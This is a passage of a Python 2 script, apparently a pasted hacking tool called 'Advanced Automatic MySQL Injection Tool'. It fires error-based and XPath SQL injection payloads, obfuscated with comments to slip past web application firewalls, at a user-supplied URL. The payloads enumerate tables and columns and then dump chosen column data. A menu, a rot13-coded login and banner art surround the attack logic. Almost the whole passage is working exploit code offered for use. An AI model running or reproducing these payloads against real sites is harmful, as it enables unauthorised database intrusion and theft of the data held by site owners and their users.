- xur11 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+8,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr11 = re.findall("Duplicate entry '(.*)~",xur11)
- xur12 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+9,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr12 = re.findall("Duplicate entry '(.*)~",xur12)
- xur13 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+10,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr13 = re.findall("Duplicate entry '(.*)~",xur13)
- xur14 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+11,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr14 = re.findall("Duplicate entry '(.*)~",xur14)
- xur15 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+12,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr15 = re.findall("Duplicate entry '(.*)~",xur15)
- xur16 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+13,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr16 = re.findall("Duplicate entry '(.*)~",xur16)
- xur17 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+14,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr17 = re.findall("Duplicate entry '(.*)~",xur17)
- xur18 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+15,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr18 = re.findall("Duplicate entry '(.*)~",xur18)
- xur19 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+16,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr19 = re.findall("Duplicate entry '(.*)~",xur19)
- xur20 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+17,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr20 = re.findall("Duplicate entry '(.*)~",xur20)
- xur21 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+18,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr21 = re.findall("Duplicate entry '(.*)~",xur21)
- xur22 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+19,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr22 = re.findall("Duplicate entry '(.*)~",xur22)
- xur23 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+20,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr23 = re.findall("Duplicate entry '(.*)~",xur23)
- print "\nDatabase Version : "
- print pr
- print "\nDatabase Name : "
- print pr1
- print "\nDatabase User : "
- print pr2
- print "\nTables :"
- print pr3
- print pr4
- print pr5
- print pr6
- print pr7
- print pr8
- print pr9
- print pr10
- print pr11
- print pr12
- print pr13
- print pr14
- print pr15
- print pr16
- print pr17
- print pr18
- print pr19
- print pr20
- print pr21
- print pr22
- print pr23
- print "\n\n"
- xpcol = raw_input("Enter The Name Of Table to Grab Columns :")
- xpcol1 = xpcol.encode("hex")
- xur24 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+0,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
- pr24 = re.findall("Duplicate entry '(.*)~",xur24)
- xur25 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+1,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
- pr25 = re.findall("Duplicate entry '(.*)~",xur25)
- xur26 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+2,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
- pr26 = re.findall("Duplicate entry '(.*)~",xur26)
- xur27 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+3,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
- pr27 = re.findall("Duplicate entry '(.*)~",xur27)
- xur28 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+4,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
- pr28 = re.findall("Duplicate entry '(.*)~",xur28)
- xur29 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+5,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
- pr29 = re.findall("Duplicate entry '(.*)~",xur29)
- xur30 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+6,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
- pr30 = re.findall("Duplicate entry '(.*)~",xur30)
- xur31 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+7,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
- pr31 = re.findall("Duplicate entry '(.*)~",xur31)
- xur32 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+8,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
- pr32 = re.findall("Duplicate entry '(.*)~",xur32)
- xur33 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+9,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
- pr33 = re.findall("Duplicate entry '(.*)~",xur33)
- xur34 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+10,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
- pr34 = re.findall("Duplicate entry '(.*)~",xur34)
- xur35 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+11,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
- pr35 = re.findall("Duplicate entry '(.*)~",xur35)
- xur36 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+12,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
- pr36 = re.findall("Duplicate entry '(.*)~",xur36)
- xur37 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+13,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
- pr37 = re.findall("Duplicate entry '(.*)~",xur37)
- xur38 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000column_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/columns+/*!00000where*/+/*!00000table_name*/=0x%s+limit+14,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ( ur, xpcol1)).read()
- pr38 = re.findall("Duplicate entry '(.*)~",xur38)
- print "\nColumns : "
- print pr24
- print pr25
- print pr26
- print pr27
- print pr28
- print pr29
- print pr30
- print pr31
- print pr32
- print pr33
- print pr34
- print pr35
- print pr36
- print pr37
- print pr38
- print "\n Note : If you don't want any column just leave it empty :)\n"
- xpdt = raw_input("Enter First Column Name : ")
- xpdt1 = raw_input("Enter Second Column Name : ")
- xpdt2 = raw_input("Enter Third Column Name : ")
- xpdt3 = raw_input("Enter Fourth Column Name : ")
- xpdt4 = raw_input("Enter Fifth Column Name : ")
- wfxur39 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!%s*/+/*!from*/+%s+limit+0,1)),0x3a)--+' % ( ur, xpdt, xpcol)).read()
- wfpr39 = re.findall("XPATH syntax error: ':(.*)'",wfxur39)
- wfxur40 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!%s*/+/*!from*/+%s+limit+0,1)),0x3a)--+' % ( ur, xpdt1, xpcol)).read()
- wfpr40 = re.findall("XPATH syntax error: ':(.*)'",wfxur40)
- wfxur41 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!%s*/+/*!from*/+%s+limit+0,1)),0x3a)--+' % ( ur, xpdt2, xpcol)).read()
- wfpr41 = re.findall("XPATH syntax error: ':(.*)'",wfxur41)
- wfxur42 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!%s*/+/*!from*/+%s+limit+0,1)),0x3a)--+' % ( ur, xpdt3, xpcol)).read()
- wfpr42 = re.findall("XPATH syntax error: ':(.*)'",wfxur42)
- wfxur43 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!%s*/+/*!from*/+%s+limit+0,1)),0x3a)--+' % ( ur, xpdt4, xpcol)).read()
- wfpr43 = re.findall("XPATH syntax error: ':(.*)'",wfxur43)
- print "\n\nFirst Column Result : "
- print wfpr39
- print "\nSecond Column Result : "
- print wfpr40
- print "\nThird Column Result : "
- print wfpr41
- print "\nFourth Column Result : "
- print wfpr42
- print "\nFifth Column Result : "
- print wfpr43
- print "\n\n All Processes Done!\n Turning Off All Functions!"
- time.sleep(1)
- print "Press Enter To Exit.."
- def xpath_main():
- time.sleep(1.4)
- os.system("cls")
- print "\n" + "~"*50 + "\n - Xpath Injection\n" + "~"*50+ "\n\n"
- print "# -- Xpath Simple = 1\n# -- Xpath WAF Bypassed = 2\n"
- loxx = raw_input("Enter Code : ")
- if(loxx =='1'):
- print "\n\n XPATH Simple \n"
- xpath_simple()
- elif(loxx =='2'):
- print "\n\n XPATH WAF-Bypassed \n"
- xpath_waf()
- else:
- print " Please Enter Valid Code Leet!"
- def error_main():
- time.sleep(1.4)
- os.system("cls")
- print "\n" + "~"*50 + "\n - Error Based Injection\n" + "~"*50+ "\n\n"
- print "# -- Error Based Simple = 1\n# -- Error Based WAF Bypassed = 2\n"
- eblox = raw_input("Enter Code : ")
- if(eblox =='1'):
- print "\n\n Error Based Simple \n"
- error_simple()
- elif(eblox =='2'):
- print "\n\n Error Based WAF-Bypassed \n"
- error_waf()
- else:
- print " Please Enter Valid Code Leet!"
- def duplicate_main():
- time.sleep(1.4)
- os.system("cls")
- print "\n" + "~"*50 + "\n - Duplicate Entry Injection\n" + "~"*50+ "\n\n"
- print "# -- Duplicate Entry Simple = 1\n# -- Duplicate Entry WAF Bypassed = 2\n"
- ebloxx = raw_input("Enter Code : ")
- if(ebloxx =='1'):
- print "\n\n Duplicate Entry Simple \n"
- duplicate_simple()
- elif(ebloxx =='2'):
- print "\n\n Duplicate Entry WAF-Bypassed \n"
- duplicate_waf()
- else:
- print " Please Enter Valid Code Leet!"
- def typex():
- print "# -- Xpath = 1\n# -- Duplicate Entry = 2"
- print "\n\n"
- tyas = raw_input("Enter Code : ")
- if(tyas =='1'):
- xpath_main()
- elif(tyas =='2'):
- duplicate_main()
- else:
- print "Please Enter Valid Code Leet!"
- def intro():
- def sysacc():
- os.system("cls")
- time.sleep(1)
- os.system("title - Advanced Automatic MySQL Injection Tool :: Coded By James ::")
- usx = 'hfre'
- psx = 'cnff'
- print "\n ### Please Login To Continue ###\n" + "-"*55
- pol = raw_input(" Enter Your Username : ")
- pol1 = raw_input(" Enter Your Password : ")
- if(pol != usx.decode('rot13','strict')):
- print "Username is Incorrect!"
- time.sleep(1)
- sys.exit(0)
- if(pol1 != psx.decode('rot13','strict')):
- print "Password is Incorrect!"
- time.sleep(1)
- sys.exit(0)
- acc()
- sysacc()
- os.system("cls")
- os.system("title - Advanced Automatic MySQL Injection Tool :: Coded By James ::")
- os.system("color A")
- print "\n"
- time.sleep(2)
- print (" :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::")
- print (" :: ***** ::")
- print (" ::~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~::")
- print (" :: | Advanced Automatic MySQL Injection Tool | ::")
- print (" ::~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~::")
- print (" :: | Coded By hAxOr James* | ::")
- print (" :: | Security Is Just An ILLUSION | ::")
- print (" :: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ::")
- print (" :: ***** ::")
- print (" :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::")
- time.sleep(1)
- os.system("color B")
- time.sleep(.8)
- os.system("color A")
- time.sleep(.8)
- os.system("color C")
- print "\n\n"
- time.sleep(1)
- print "Script Loaded !\nStarting All Functions..\n"
- time.sleep(.8)
- print " Done! \n\n Let's Start !"
- print "----------------------------------------------------------"
- time.sleep(1.2)
- typex()
- def acc1():
- os.system("cls")
- time.sleep(1)
- os.system("title - Advanced Automatic MySQL Injection Tool :: Coded By James ::")
- usx = 'hfre'
- psx = 'cnff'
- print "\n ### Please Login To Continue ###\n" + "-"*55
- pol = raw_input(" Enter Your Username : ")
- pol1 = raw_input(" Enter Your Password : ")
- if(pol != usx):
- print "Username is Incorrect!"
- time.sleep(1)
- sys.exit(0)
- if(pol1 != psx):
- print "Password is Incorrect!"
- time.sleep(1)
- sys.exit(0)
- acc()
- intro()
- input("")
- # ---- hAxOr James* =)
Add Comment
Please, Sign In to add comment